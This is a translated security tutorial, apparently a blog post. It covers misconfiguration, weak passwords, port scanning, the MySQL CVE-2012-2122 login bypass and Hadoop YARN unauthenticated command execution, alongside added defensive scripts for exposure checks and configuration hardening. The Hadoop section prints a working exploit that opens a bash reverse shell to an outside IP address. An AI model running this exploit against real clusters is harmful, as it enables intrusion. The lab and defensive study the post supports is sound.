Service attack and defense - database security - service application security issues and testing process - MySQL & Hadoop & unauthorized access & RCE - vulnerability reproduction

Table of contents

1. Security issues of service applications
   1. Improper configuration - unauthorized access
   2. Security mechanism - specific security vulnerabilities
   3. Security mechanism - weak password brute-force attack
2. Security testing ideas for service applications
   1. Determine whether the service is open
   2. Determine the type of service
   3. Determine the method of use
3. MySQL - unauthorized access - CVE-2012-2122 exploitation
   1. Vulnerability overview
   2. Vulnerability reproduction
   3. Supplementary knowledge points
4. Hadoop - unauthorized access combined with built-in command execution (RCE)
   1. Introduction to Hadoop
   2. Vulnerability reproduction


1. Security issues of service applications

1. Improper configuration - unauthorized access

When the target deploys a service application with its default configuration, or modifies the security-relevant settings incorrectly, the result is a misconfiguration that introduces security problems.

The most common consequence of misconfiguration is unauthorized access.

2. Security mechanism - specific security vulnerabilities

Unauthorized access is generally caused by misconfiguration; that is, the software itself is not at fault. Security-mechanism issues, by contrast, are problems in the software or application service itself and have nothing to do with its configuration.

3. Security mechanism - weak password brute-force attack

Some services use password verification to decide whether access is allowed or denied. For example, a database has built-in users, each with an account name and password. If the configured account name and password are too simple, an attacker can obtain them by guessing weak passwords and then log in to carry out further security testing.

2. Security testing ideas for service applications

1. Determine whether the service is open

Since we are discussing the security of a service, if the service does not exist on the target, its security issues cannot exist either, and there is no need to test further.

  • Port scan

Tools such as nmap can be used. The principle: a running service must listen on a port, and most services use a default port, so the port number tells us which service is likely open. For example, the default port of MySQL is 3306, Oracle's is 1521, SQL Server's is 1433 and Redis's is 6379.

Of course, the user can change the port number, but usually it is left unchanged.

There is a special case: the service is clearly running, yet the port does not appear open. Why?

Three reasons:

(1) It is on the intranet (the main reason).

The service runs on an intranet host. Many services (ports), such as the web server and the database, are open within the intranet, but only the web service is mapped to the external network, so from outside we see only that service as enabled. When scanning, we only reach the internet-facing host, which forwards the data to the intranet for processing, so the ports of the other services cannot be detected.

(2) The port has been changed (less likely).

(3) Interference from protection software.

  • Combination guess

That is, knowing that where service A exists, service B is very likely to exist as well.

  • Information sources

Some services return error messages or prompts during security testing, from which we can infer that certain services exist.
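The port-scan step above infers a service from its default port (3306 for MySQL, and so on). The following added example, which is not part of the original post, turns that inference into a reachability check a defender can run from a given vantage point to confirm that only the intended ports (for instance the web port, not the database port) are reachable from outside. The port-to-service table, the loopback self-test listener and the host name in the final comment are constructed for this example.

```python
"""Exposure check for default service ports (added example, not the post's code)."""
import socket

# Default ports named in the text, plus the SSH/RDP ports from the remote-control section.
DEFAULT_PORTS = {
    3306: "MySQL",
    1521: "Oracle",
    1433: "SQL Server",
    6379: "Redis",
    22: "SSH",
    3389: "RDP",
}


def is_port_open(host: str, port: int, timeout: float = 1.0) -> bool:
    """Return True if a TCP handshake to host:port completes within the timeout.

    A refused connection, a timeout (typical of a filtered port or a service that
    is only reachable on the intranet) and a name-resolution failure all count as
    "not open" from this vantage point.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def check_exposure(host: str, ports=None, timeout: float = 1.0) -> dict:
    """Probe each port and return {port: (service_name, reachable)}."""
    ports = DEFAULT_PORTS if ports is None else ports
    return {port: (name, is_port_open(host, port, timeout)) for port, name in ports.items()}


def exposed_services(host: str, ports=None, timeout: float = 1.0) -> list:
    """Only the reachable entries, e.g. ['MySQL (3306)'] when a database faces the network."""
    return [
        f"{name} ({port})"
        for port, (name, reachable) in check_exposure(host, ports, timeout).items()
        if reachable
    ]


def self_test() -> dict:
    """Offline demonstration on loopback: one listening port and one closed port.

    Returns {"listener": True, "closed": False} when the probe logic works.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))  # the kernel picks a free port
    listener.listen(1)
    open_port = listener.getsockname()[1]

    spare = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    spare.bind(("127.0.0.1", 0))
    closed_port = spare.getsockname()[1]
    spare.close()  # nothing listens on this port any more

    try:
        result = check_exposure("127.0.0.1", {open_port: "listener", closed_port: "closed"})
    finally:
        listener.close()
    return {name: reachable for name, reachable in result.values()}


if __name__ == "__main__":
    print(self_test())
    # Against a host you administer (constructed name): print(exposed_services("db.example.internal"))
```

A port that this check reports as closed from the internet but open from inside the network is exactly the intranet case described above: the service exists, but only the mapped service is visible externally.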

2. Determine the type of service

Determine what services exist based on the service type, then determine what security problems each type may have and how those problems can be exploited.

  • database
  • file transfer
  • remote control

For example, Remote Desktop Protocol (RDP), used for remote connections to Windows systems, uses TCP port 3389; Linux systems can be accessed and controlled remotely over SSH (Secure Shell), which uses TCP port 22. Connecting requires the correct account name and password, and that is the key point of this process: an attacker who obtains them can connect directly, which is equivalent to taking over the server. Attackers may try to obtain them by password brute-forcing.

  • data communication

3. Determine the method of use

Use the existing services and service types identified earlier to decide how the possible security issues can be used for the next step.

  • Feature vulnerabilities

Exploit the security problems of the service itself.

  • Unauthorized access

The target's service application is misconfigured, and unauthorized access may be possible.

  • Weak password brute-forcing

Where account passwords are involved, brute-force guessing of the account name and password can be used.

3. MySQL - unauthorized access - CVE-2012-2122 exploitation

1. Vulnerability overview

  • Affected versions:
    • MariaDB: versions 5.1.62, 5.2.12, 5.3.6 and 5.5.23 and later are not affected.
    • MySQL: versions 5.1.63, 5.5.24 and 5.6.6 and later are not affected.
  • Vulnerability description:

When connecting to MariaDB/MySQL, the supplied password is compared with the expected correct password. Because the comparison result is handled incorrectly, MySQL may treat the two passwords as identical even when memcmp() returns a non-zero value. That is, knowing only the user name, an attacker can log in to the database simply by retrying the connection; according to the advisory, roughly one attempt in 256 is accepted.
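The "about once in 256" figure comes from a type-narrowing bug, and the following added illustration (not MySQL's source code) models it: MySQL's scramble check declared its return type as my_bool, a C char, but returned memcmp()'s int directly. With an optimized memcmp that returns an arbitrary difference rather than just -1/0/1, narrowing that int to 8 bits keeps only the low byte, so every difference that is a multiple of 256 becomes 0, which the caller reads as "password matches". The wide_memcmp() model, the constructed digests and the function names are assumptions of this example; the vulnerable check and the fixed check are shown side by side.

```python
"""Model of the CVE-2012-2122 comparison defect (added example, not MySQL's code)."""
import random

SHA1_HASH_SIZE = 20  # the scramble comparison covers a 20-byte SHA-1 digest


def wide_memcmp(a: bytes, b: bytes) -> int:
    """Constructed model of a word-at-a-time memcmp.

    Returns the signed 32-bit difference of the first mismatching 4-byte word
    (0 when equal): values well outside -1/0/1, which the C standard permits
    and optimized libc implementations actually produce.
    """
    assert len(a) == len(b) == SHA1_HASH_SIZE
    for i in range(0, SHA1_HASH_SIZE, 4):
        wa = int.from_bytes(a[i:i + 4], "big")
        wb = int.from_bytes(b[i:i + 4], "big")
        if wa != wb:
            diff = (wa - wb) & 0xFFFFFFFF  # wrap like 32-bit arithmetic
            return diff - (1 << 32) if diff >= (1 << 31) else diff
    return 0


def to_my_bool(value: int) -> int:
    """C's int -> char conversion: only the low 8 bits survive."""
    return value & 0xFF


def vulnerable_check(stored: bytes, supplied: bytes) -> bool:
    """Pre-fix logic: memcmp's int is narrowed to my_bool *before* the zero test."""
    return to_my_bool(wide_memcmp(stored, supplied)) == 0


def fixed_check(stored: bytes, supplied: bytes) -> bool:
    """Post-fix logic: decide equal/not-equal while the value is still an int."""
    return wide_memcmp(stored, supplied) == 0


def hash_with_first_word(word: int) -> bytes:
    """Constructed 20-byte digest whose first word is `word` and whose rest is zero."""
    return word.to_bytes(4, "big") + bytes(SHA1_HASH_SIZE - 4)


def sequential_false_accepts(trials: int) -> int:
    """Count wrong digests (first word 1..trials) that the vulnerable check accepts.

    Exactly the differences that are multiples of 256 slip through: trials // 256.
    """
    stored = hash_with_first_word(0)
    return sum(vulnerable_check(stored, hash_with_first_word(i)) for i in range(1, trials + 1))


def random_false_accepts(trials: int, seed: int = 2012) -> int:
    """Same experiment with random digests, mirroring repeated login attempts.

    The count lands near trials / 256; the fixed check accepts none of them.
    """
    rng = random.Random(seed)
    stored = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
    accepted = 0
    for _ in range(trials):
        supplied = bytes(rng.getrandbits(8) for _ in range(SHA1_HASH_SIZE))
        accepted += vulnerable_check(stored, supplied) and not fixed_check(stored, supplied)
    return accepted


if __name__ == "__main__":
    print("false accepts in 65535 sequential tries:", sequential_false_accepts(65535))
    print("false accepts in 51200 random tries (expect about 200):", random_false_accepts(51200))
```

The fix that MySQL and MariaDB shipped is the second shape: reduce the comparison to a true/false result before it is stored in the narrow type. Whether a given build was exploitable depended on the platform's memcmp, which is why the affected-version list alone does not settle the question for a specific installation.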

2. Vulnerability reproduction

Start the environment first.

Use an online port-scanning service to scan the environment's open ports, entering the IP address in the position shown in the figure below.

The probe results are shown in the figure below. Port 3306 is open, so we know that the MySQL service exists.

Next, we check whether the vulnerability described above exists by executing the command shown in the figure below.

After running that command, the effect is shown in the figure below: because the password is wrong, an error is reported on every attempt, until at some point no error is reported and the connection enters the database directly.

3. Supplementary knowledge points

By default, MySQL allows the root user to log in only locally and rejects remote connection requests, so we cannot brute-force the password remotely: we cannot even connect.

Therefore, we can only guess through something like phpMyAdmin. As a third-party database management application deployed on the target's own server, it logs in to the database from local to local, so testing through it is possible.

So how do we judge whether phpMyAdmin exists on the website? Visit the website in a browser and try the following paths in the URL address bar (a directory scanning tool can also be used to check for these paths directly):

  • /phpmyadmin
  • /pma
  • /myadmin
  • /mysql

If you see the phpMyAdmin login page, phpMyAdmin is very likely present on the site, and you may be able to log in with the default credentials.

If you see a 404 error page, phpMyAdmin probably does not exist on the site, or it has been moved to a different location.

Note, however, that even if none of the above URLs responds, the presence of phpMyAdmin cannot be completely ruled out. Administrators may have renamed or moved it to a different location to avoid detection, so additional checks are needed when evaluating the security of a website.

4. Hadoop - unauthorized access combined with built-in command execution (RCE)

1. Introduction to Hadoop

Hadoop is an open-source distributed computing platform for processing large-scale data sets. It provides distributed storage and distributed processing, and can process data efficiently on large server clusters.

It is typically used for large-scale data processing such as data analysis, data mining and machine learning. Its design philosophy is to split large data sets into multiple blocks and process those blocks in parallel on multiple computing nodes.

Commonly used port configurations are as follows (we usually look mainly at port 50010):

2. Vulnerability reproduction

In the practice range, select "Hadoop" among the database options.

Start the environment.

Go to the address provided by the range.

Visit the /cluster/apps page (if this page is reachable, the unauthorized access vulnerability exists).

Use the following published exploit to obtain a reverse shell.

#!/usr/bin/env python

import requests

target = 'http://123.58.236.76:31367/' # change this to the target host address
lhost = '47.94.236.117' # enter your IP address here (the externally reachable address that receives the reverse shell); the listening port is 9999

url = target + 'ws/v1/cluster/apps/new-application'
resp = requests.post(url)
app_id = resp.json()['application-id']
url = target + 'ws/v1/cluster/apps'
data = {
    'application-id': app_id,
    'application-name': 'get-shell',
    'am-container-spec': {
        'commands': {
            'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost,
        },
    },
    'application-type': 'YARN',
}
requests.post(url, json=data)

Create a .py file on the desktop and save the above exploit in it.

Enter the following command to start listening on port 7777.

Open cmd and enter the following command to run the newly created exploit.

You can see that the reverse shell was received successfully.
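The reproduction above works because the ResourceManager's /ws/v1/cluster/apps endpoints answer requests from anyone, and that is Hadoop's default: simple authentication, anonymous HTTP access allowed, and service-level authorization disabled. The following added example, which is neither Hadoop's code nor part of the exploit, audits a core-site.xml for the four properties that govern this and shows a weak configuration beside a hardened one. The property names are real Hadoop settings; the two XML documents, the function names and the host name in them are constructed for this example.

```python
"""Audit of the core-site.xml settings behind unauthenticated YARN REST access (added example)."""
import xml.etree.ElementTree as ET

# property name -> (required value, what the weak value or the default allows)
REQUIRED = {
    "hadoop.security.authentication": (
        "kerberos", "RPC and REST callers are otherwise unauthenticated (default: simple)"),
    "hadoop.security.authorization": (
        "true", "service-level ACLs are not enforced (default: false)"),
    "hadoop.http.authentication.type": (
        "kerberos", "web UIs and REST APIs accept any caller (default: simple)"),
    "hadoop.http.authentication.simple.anonymous.allowed": (
        "false", "requests without a user name are served anonymously (default: true)"),
}


def parse_properties(xml_text: str) -> dict:
    """Return {name: value} from a Hadoop-style <configuration> document."""
    root = ET.fromstring(xml_text)
    props = {}
    for prop in root.findall("property"):
        name = prop.findtext("name")
        value = prop.findtext("value")
        if name is not None:
            props[name.strip()] = (value or "").strip()
    return props


def audit_core_site(xml_text: str) -> list:
    """One finding per weak or absent property; an empty list means hardened.

    A missing property is reported as well, because Hadoop then applies the
    insecure default rather than failing closed.
    """
    props = parse_properties(xml_text)
    findings = []
    for name, (wanted, reason) in REQUIRED.items():
        actual = props.get(name)
        if actual is None:
            findings.append(f"{name} not set, insecure default applies: {reason}")
        elif actual.lower() != wanted:
            findings.append(f"{name}={actual!r}, expected {wanted!r}: {reason}")
    return findings


# Constructed sample: the out-of-the-box shape behind the reproduction above.
WEAK_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property>
    <name>fs.defaultFS</name>
    <value>hdfs://namenode.example.internal:9000</value>
  </property>
  <property>
    <name>hadoop.security.authentication</name>
    <value>simple</value>
  </property>
</configuration>
"""

# Constructed sample: the same cluster with the four settings hardened.
HARDENED_CORE_SITE = """<?xml version="1.0"?>
<configuration>
  <property>
    <name>fs.defaultFS</name>
    <value>hdfs://namenode.example.internal:9000</value>
  </property>
  <property>
    <name>hadoop.security.authentication</name>
    <value>kerberos</value>
  </property>
  <property>
    <name>hadoop.security.authorization</name>
    <value>true</value>
  </property>
  <property>
    <name>hadoop.http.authentication.type</name>
    <value>kerberos</value>
  </property>
  <property>
    <name>hadoop.http.authentication.simple.anonymous.allowed</name>
    <value>false</value>
  </property>
</configuration>
"""

if __name__ == "__main__":
    for label, doc in (("weak", WEAK_CORE_SITE), ("hardened", HARDENED_CORE_SITE)):
        findings = audit_core_site(doc)
        print(f"{label}: {len(findings)} finding(s)")
        for finding in findings:
            print("  -", finding)
```

Setting these properties to the hardened values is only the configuration half of the fix: Kerberos authentication also needs the principals and keytabs of a secure-cluster deployment, and a ResourceManager whose web port is reachable from untrusted networks should additionally be restricted at the network level, which is the intranet-versus-external distinction discussed in the port-scan section.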


Next article: https://blog.csdn.net/weixin_62808713/article/details/130451511



Origin blog.csdn.net/weixin_62808713/article/details/130444142